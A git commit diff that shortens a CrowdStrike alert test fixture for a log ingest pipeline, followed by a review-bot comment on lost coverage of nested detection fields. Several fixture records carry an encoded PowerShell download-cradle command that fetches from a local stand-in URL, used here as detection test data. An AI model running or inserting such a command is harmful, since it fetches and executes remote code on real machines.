
Commit 3a5be2e

Make the test event shorter
1 parent 36f045c commit 3a5be2e


2 files changed

+47
-302
lines changed


packages/crowdstrike/data_stream/alert/_dev/test/pipeline/test-alert.log

Lines changed: 1 addition & 1 deletion
@@ -6,4 +6,4 @@
66
{"agent_id":"abcd1234abcd1234abcd12","aggregate_id":"","cid":"asdfasdfsadfasdfasdf","command_line":"powershell -nop -exec bypass -EncodedCommand QQBCAEMAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAyADcALgAwAC4AMAAuADEAOgAxADIAMwA0ADUALwAnACkA","composite_id":"b1571642dd47ef39ab7930ff655b5fee:lead:42dd47ef39ab7930ff655b5feeb15716:2dd47ef39ab7930ff655b5fee5f87ab3","crawled_timestamp":"2024-11-07T20:49:59.12345678Z","created_timestamp":"2024-11-07T20:49:59.123432101Z","detect_type":"endpoint","host_name":"SOMEHOST","host_type":"Server","id":"lead:42dd47ef39ab7930ff655b5feeb15716:2dd47ef39ab7930ff655b5fee5f87ab3","image_file_name":"\\Device\\HarddiskVolume1\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe","operating_system":"Windows","pattern_id":97000,"poly_id":"CCsPIUqaBDazAOtSAoM7lq6mNa0VpOykjauHXxb2GDCIAAt9RxW1JGn1EjTE6TITrO9y8QA5VghO2K9xAIDbSfdGo30pFQ==","process_id":"123456789123","product":"overwatch","seconds_to_resolved":0,"seconds_to_triaged":0,"show_in_ui":true,"status":"new","tags":["ow/investigated","ow/resolution/benign"],"timestamp":"2024-11-07T20:47:22Z","tree_id":"12345678901","type":"lead","updated_timestamp":"2024-11-07T20:49:59.123432101Z"}
77
{"name":"OTHERUSER on OTHERHOST","agent_id":"abcd1234abcd1234abcd12","aggregate_id":"","cid":"asdfasdfsadfasdfasdf","command_line":"powershell -nop -exec bypass -EncodedCommand QQBCAEMAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAyADcALgAwAC4AMAAuADEAOgAxADIAMwA0ADUALwAnACkA","composite_id":"b1571642dd47ef39ab7930ff655b5fee:lead:42dd47ef39ab7930ff655b5feeb15716:2dd47ef39ab7930ff655b5fee5f87ab3","crawled_timestamp":"2024-11-07T20:49:59.12345678Z","created_timestamp":"2024-11-07T20:49:59.123432101Z","detect_type":"endpoint","host_name":"SOMEHOST","host_type":"Server","id":"lead:42dd47ef39ab7930ff655b5feeb15716:2dd47ef39ab7930ff655b5fee5f87ab3","image_file_name":"\\Device\\HarddiskVolume1\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe","operating_system":"Windows","pattern_id":97000,"poly_id":"CCsPIUqaBDazAOtSAoM7lq6mNa0VpOykjauHXxb2GDCIAAt9RxW1JGn1EjTE6TITrO9y8QA5VghO2K9xAIDbSfdGo30pFQ==","process_id":"123456789123","product":"overwatch","seconds_to_resolved":0,"seconds_to_triaged":0,"show_in_ui":true,"status":"new","tags":["ow/investigated","ow/resolution/benign"],"timestamp":"2024-11-07T20:47:22Z","tree_id":"12345678901","type":"lead","updated_timestamp":"2024-11-07T20:49:59.123432101Z"}
88
{"name":"OTHERUSER on OTHERHOST","agent_id":"abcd1234abcd1234abcd12","aggregate_id":"","cid":"asdfasdfsadfasdfasdf","command_line":"powershell -nop -exec bypass -EncodedCommand QQBCAEMAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAyADcALgAwAC4AMAAuADEAOgAxADIAMwA0ADUALwAnACkA","composite_id":"b1571642dd47ef39ab7930ff655b5fee:lead:42dd47ef39ab7930ff655b5feeb15716:2dd47ef39ab7930ff655b5fee5f87ab3","crawled_timestamp":"2024-11-07T20:49:59.12345678Z","created_timestamp":"2024-11-07T20:49:59.123432101Z","detect_type":"endpoint","user_name":"SOMEUSER","host_type":"Server","id":"lead:42dd47ef39ab7930ff655b5feeb15716:2dd47ef39ab7930ff655b5fee5f87ab3","image_file_name":"\\Device\\HarddiskVolume1\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe","operating_system":"Windows","pattern_id":97000,"poly_id":"CCsPIUqaBDazAOtSAoM7lq6mNa0VpOykjauHXxb2GDCIAAt9RxW1JGn1EjTE6TITrO9y8QA5VghO2K9xAIDbSfdGo30pFQ==","process_id":"123456789123","product":"overwatch","seconds_to_resolved":0,"seconds_to_triaged":0,"show_in_ui":true,"status":"new","tags":["ow/investigated","ow/resolution/benign"],"timestamp":"2024-11-07T20:47:22Z","tree_id":"12345678901","type":"lead","updated_timestamp":"2024-11-07T20:49:59.123432101Z"}
9-
{"agent_id":"2ce412d17b334ad4adc8c1c54dbfec4b","aggregate_id":"aggind:2ce412d17b334ad4adc8c1c54dbfec4b:163208931778","alleged_filetype":"exe","cid":"92012896127c4a948236ba7601b886b0","cloud_indicator":"false","cmdline":"\"C:\\Users\\example.user\\AppData\\Local\\Temp\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\pfSenseFirewallOpenVPNClients\\Windows\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe\"","composite_id":"92012896127c4a8236ba7601b886b0:ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600","confidence":10,"context_timestamp":"2023-11-03T18:00:31Z","control_graph_id":"ctg:2ce4127b334ad4adc8c1c54dbfec4b:163208931778","crawl_edge_ids":{"Sensor":["KZcZ=__;K&cmqQ]Z=W,QK4W.9(rBfs\\gfmjTblqI^F-_oNnAWQ&-o0:dR/>>2J<d2T/ji6R&RIHe-tZSkP*q?HW;:leq.:kk)>IVMD36[+=kiQDRm.bB?;d\"V0JaQlaltC59Iq6nM?6`>ZAs+LbOJ9p9A;9'WV9^H3XEMs8N","KZcZA__;?\"cmott@m_k)MSZ^+C?.cg<Lga#0@71X07*LY2teE56*16pL[=!bjF7g@0jOQE'jT6RX_F@sr#RP-U/d[#nm9A,A,W%cl/T@<W`alY1K_h%QDBBF;_e7S!!*'!","KZd)iK2;s\\ckQl_P*d=Mo?^a7/JKc\\*L48169!7I5;0\\<H^hNG\"ZQ3#U3\"eo<>92t[f!>*b9WLY@H!V0N,BJsNSTD:?/+fY';e<OHh9AmlT?5<gGqK:*L99kat+P)eZ$HR\"Ql@Q!!!$!rr","N6=Ks_B9Bncmur)?\\[fV$k/N5;:6@aB$P;R$2XAaPJ?E<G5,UfaP')8#2AY4ff+q?T?b0/RBi-YAeGmb<6Bqp[DZh#I(jObGkjJJaMf\\:#mb;BM\\L[g!\\F*M!!*'!","N6B%O`'=_7d#%u&d[+LTNDs<3307?8n=GrFI:4YYGCL,cIt-Tuj!&<6:3RbC`uNjL#gW&=)E`4^/'fp*.bFX@p_$,R6.\"=lV*T*5Vf`c.:nkd$+YD:DJ,Ls0[sArC')K%YTc$:@kUQW5s8N","N6B%s!\\k)ed$F6>a%iM\"<FTSe/eH8M:<9gf;$$.b??kpC*99aX!Lq:g6:Q3@Ga4Zrb@MaMa]L'YAt$IFBu])\"H^sF$r7gDPf6&CHpVKO3<DgK9,Y/e@V\"b&m!<<'","N6CU&`%VT\"d$=67=h\\I)/BJH:8-lS!.%\\-!$1@bAhtVO?q4]9'9'haE4N0*-0Uh'-'f',YW3]T=jL3D#N=fJi]Pp-bWej+R9q[%h[p]p26NK8q3b50k9G:.&eM<Qer>__\"59K'R?_=`'`rK/'hA\"r+L5i-*Ut5PI!!*'!","N6CUF__;K!d$:[C93.?=/5(`5KnM]!L#UbnSY5HOHc#[6A&FE;(naXB4h/OG\"%MDAR=fo41Z]rXc\"J-\\&&V8UW.?I6V*G+,))Ztu_IuCMV#ZJ:QDJ_EjQmjiX#HENY'WD0rVAV$Gl6_+0e:2$8D)):.LUs+8-S$L!!!$!rr","N6CUF__;K!d$:\\N43JV0AO56@6D0$!na(s)d.dQ'
iI1*uiKt#j?r\"X'\\AtNML2_C__7ic6,8Dc[F<0NTUGtl%HD#?/Y)t8!1X.;G!*FQ9GP-ukQn`6I##&$^81(P+hN*-#rf/cUs)Wb\"<_/?I'[##WMh'H[Rcl+!!<<'","N6L[G__;K!d\"qhT7k?[D\"Bk:5s%+=>#DM0j$_<r/JG0TCEQ!Ug(be3)&R2JnX+RSqorgC-NCjf6XATBWX(5<L1J1DV>44ZjO9q*d!YLuHhkq!3>3tpi>OPYZp9]5f1#/AlRZL06`/I6cl\"d.&=To@9kS!prs8N"]},"crawl_vertex_ids":{"Sensor":["aggind:2ce412d17b334ad4adc8c1c54dbfec4b:163208931778","ctg:2ce412d17b334ad4adc8c1c54dbfec4b:163208931778","ind:2ce412d17b34ad4adc8c1c54dbfec4b:399748687993-5761-42627600","mod:2ce412d17b4ad4adc8c1c54dbfec4b:0b25d56bd2b4d8a6df45beff7be165117fbf7ba6ba2c07744f039143866335e4","mod:2ce412d17b4ad4adc8c1c54dbfec4b:b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd","mod:2ce412d17b334ad4adc8c1c54dbfec4b:caef4ae19056eeb122a0540508fa8984cea960173ada0dc648cb846d6ef5dd33","pid:2ce412d17b33d4adc8c1c54dbfec4b:392734873135","pid:2ce412d17b334ad4adc8c1c54dbfec4b:392736520876","pid:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993","quf:2ce412d17b334ad4adc8c1c54dbfec4b:b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd","uid:2ce412d17b334ad4adc8c1c54dbfec4b:S-1-5-21-1909377054-3469629671-4104191496-4425"]},"crawled_timestamp":"2023-11-03T19:00:23.985020992Z","created_timestamp":"2023-11-03T18:01:23.995794943Z","data_domains":["Endpoint"],"description":"ThisfilemeetstheAdware/PUPAnti-malwareMLalgorithm'slowest-confidencethreshold.","device":{"agent_load_flags":"0","agent_local_time":"2023-10-12T03:45:57.753Z","agent_version":"7.04.17605.0","bios_manufacturer":"ABC","bios_version":"F8CN42WW(V2.05)","cid":"92012896127c4a948236ba7601b886b0","config_id_base":"65994763","config_id_build":"17605","config_id_platform":"3","device_id":"2ce412d17b334ad4adc8c1c54dbfec4b","external_ip":"81.2.69.142","first_seen":"2023-04-07T09:36:36Z","groups":["18704e21288243b58e4c76266d38caaf"],"hostinfo":{"active_directory_dn_display":["WinComputers","WinComputers\\ABC"],"domain":"ABC.LOCAL"},"hostname":"ABC709-1175","last_seen":"2023-11-03T17:51:42Z","local_ip":"8
1.2.69.142","mac_address":"ab-21-48-61-05-b2","machine_domain":"ABC.LOCAL","major_version":"10","minor_version":"0","modified_timestamp":"2023-11-03T17:53:43Z","os_version":"Windows11","ou":["ABC","WinComputers"],"platform_id":"0","platform_name":"Windows","pod_labels":null,"product_type":"1","product_type_desc":"Workstation","site_name":"Default-First-Site-Name","status":"normal","system_manufacturer":"LENOVO","system_product_name":"20VE"},"falcon_host_link":"https://falcon.us-2.crowdstrike.com/activity-v2/detections/dhjffg:ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600","filename":"openvpn-abc-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe","filepath":"\\Device\\HarddiskVolume3\\Users\\yuvraj.mahajan\\AppData\\Local\\Temp\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\pfSenseFirewallOpenVPNClients\\Windows\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe","grandparent_details":{"cmdline":"C:\\Windows\\system32\\userinit.exe","filename":"userinit.exe","filepath":"\\Device\\HarddiskVolume3\\Windows\\System32\\userinit.exe","local_process_id":"4328","md5":"b07f77fd3f9828b2c9d61f8a36609741","process_graph_id":"pid:2ce412d17b334ad4adc8c1c54dbfec4b:392734873135","process_id":"392734873135","sha256":"caef4ae19056eeb122a0540508fa8984cea960173ada0dc648cb846d6ef5dd33","timestamp":"2023-10-30T16:49:19Z","user_graph_id":"uid:2ce412d17b334ad4adc8c1c54dbfec4b:S-1-5-21-1909377054-3469629671-4104191496-4425","user_id":"S-1-5-21-1909377054-3469629671-4104191496-4425","user_name":"yuvraj.mahajan"},"id":"ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600","indicator_id":"ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600","ioc_context":[{"ioc_description":"\\Device\\HarddiskVolume3\\Users\\yuvraj.mahajan\\AppData\\Local\\Temp\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\pfSenseFire
wallOpenVPNClients\\Windows\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe","ioc_source":"library_load","ioc_type":"hash_sha256","ioc_value":"b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd","md5":"cdf9cfebb400ce89d5b6032bfcdc693b","sha256":"b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd","type":"module"}],"ioc_values":[],"local_process_id":"17076","logon_domain":"ABSYS","md5":"cdf9cfebb400ce89d5b6032bfcdc693b","name":"PrewittPupAdwareSensorDetect-Lowest","objective":"FalconDetectionMethod","parent_details":{"cmdline":"C:\\WINDOWS\\Explorer.EXE","filename":"explorer.exe","filepath":"\\Device\\HarddiskVolume3\\Windows\\explorer.exe","local_process_id":"1040","md5":"8cc3fcdd7d52d2d5221303c213e044ae","process_graph_id":"pid:2ce412d17b334ad4adc8c1c54dbfec4b:392736520876","process_id":"392736520876","sha256":"0b25d56bd2b4d8a6df45beff7be165117fbf7ba6ba2c07744f039143866335e4","timestamp":"2023-11-03T18:00:32Z","user_graph_id":"uid:2ce412d17b334ad4adc8c1c54dbfec4b:S-1-5-21-1909377054-3469629671-4104191496-4425","user_id":"S-1-5-21-1909377054-3469629671-4104191496-4425","user_name":"mohit.jha"},"parent_process_id":"392736520876","pattern_disposition":2176,"pattern_disposition_description":"Prevention/Quarantine,processwasblockedfromexecutionandquarantinewasattempted.","pattern_disposition_details":{"blocking_unsupported_or_disabled":false,"bootup_safeguard_enabled":false,"critical_process_disabled":false,"detect":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"inddet_mask":false,"indicator":false,"kill_action_failed":false,"kill_parent":false,"kill_process":false,"kill_subprocess":false,"operation_blocked":false,"policy_disabled":false,"process_blocked":true,"quarantine_file":true,"quarantine_machine":false,"registry_operation_blocked":false,"rooting":false,"sensor_only":false,"suspend_parent":false,"suspend_process":false},"pattern_id":5761,"platform":"Windows","poly_id":"AACSASiWEnxKlIIaw8LWC-8
XINBatE2uYZaWqRAAATiEEfPFwhoY4opnh1CQjm0tvUQp4Lu5eOAx29ZVj-qrGrA==","process_end_time":"1699034421","process_id":"399748687993","process_start_time":"1699034413","product":"epp","quarantined_files":[{"filename":"\\Device\\Volume3\\Users\\yuvraj.mahajan\\AppData\\Local\\Temp\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\pfSenseFirewallOpenVPNClients\\Windows\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe","id":"2ce412d17b334ad4adc8c1c54dbfec4b_b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd","sha256":"b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd","state":"quarantined"}],"scenario":"NGAV","severity":30,"sha1":"0000000000000000000000000000000000000000","sha256":"b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd","show_in_ui":true,"source_products":["FalconInsight"],"source_vendors":["CrowdStrike"],"status":"new","tactic":"MachineLearning","tactic_id":"CSTA0004","technique":"Adware/PUP","technique_id":"CST0000","timestamp":"2023-11-03T18:00:22.328Z","tree_id":"1931778","tree_root":"38687993","triggering_process_graph_id":"pid:2ce4124ad4adc8c1c54dbfec4b:399748687993","type":"cwpp-drift-indicators","updated_timestamp":"2023-11-03T19:00:23.985007341Z","user_id":"S-1-5-21-1909377054-3469629671-4104191496-4425","user_name":"example.user","prevented":true,"worker_node_name":"example"}
9+
{"name":"OTHERUSER on OTHERHOST","agent_id":"abcd1234abcd1234abcd12","aggregate_id":"","cid":"asdfasdfsadfasdfasdf","command_line":"powershell -nop -exec bypass -EncodedCommand QQBCAEMAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAyADcALgAwAC4AMAAuADEAOgAxADIAMwA0ADUALwAnACkA","composite_id":"b1571642dd47ef39ab7930ff655b5fee:lead:42dd47ef39ab7930ff655b5feeb15716:2dd47ef39ab7930ff655b5fee5f87ab3","crawled_timestamp":"2024-11-07T20:49:59.12345678Z","created_timestamp":"2024-11-07T20:49:59.123432101Z","detect_type":"endpoint","user_name":"SOMEUSER","host_type":"Server","id":"lead:42dd47ef39ab7930ff655b5feeb15716:2dd47ef39ab7930ff655b5fee5f87ab3","image_file_name":"\\Device\\HarddiskVolume1\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe","operating_system":"Windows","pattern_id":97000,"poly_id":"CCsPIUqaBDazAOtSAoM7lq6mNa0VpOykjauHXxb2GDCIAAt9RxW1JGn1EjTE6TITrO9y8QA5VghO2K9xAIDbSfdGo30pFQ==","process_id":"123456789123","product":"overwatch","seconds_to_resolved":0,"seconds_to_triaged":0,"show_in_ui":true,"status":"new","tags":["ow/investigated","ow/resolution/benign"],"timestamp":"2024-11-07T20:47:22Z","tree_id":"12345678901","type":"lead","updated_timestamp":"2024-11-07T20:49:59.123432101Z", "prevented":true,"worker_node_name":"example"}
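Review bot: Replacing line 9 removes the only record in this fixture with the `epp`/NGAV detection shape — `device`, `parent_details`, `grandparent_details`, `ioc_context`, `quarantined_files` and `pattern_disposition_details` — so the pipeline test no longer exercises whatever handles those nested objects, and lines 7, 8 and 9 are now near-identical copies of the same OverWatch `lead` record. A trimmed `epp` event that keeps one element of each nested object would shorten the fixture without giving up that coverage; the pipeline and the expected-output file this fixture pairs with are not in this chunk, so confirm there which fields the processors actually touch. The two fields carried over, `"prevented":true,"worker_node_name":"example"`, previously appeared only on the `epp` record, and nothing on this page shows they occur on a `lead`, so the new expectation may encode a document shape the source never emits. Minor style point: the new line has a stray space in `, "prevented"` while the rest of the record is minified; `,"prevented":true` keeps it consistent with the other lines.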
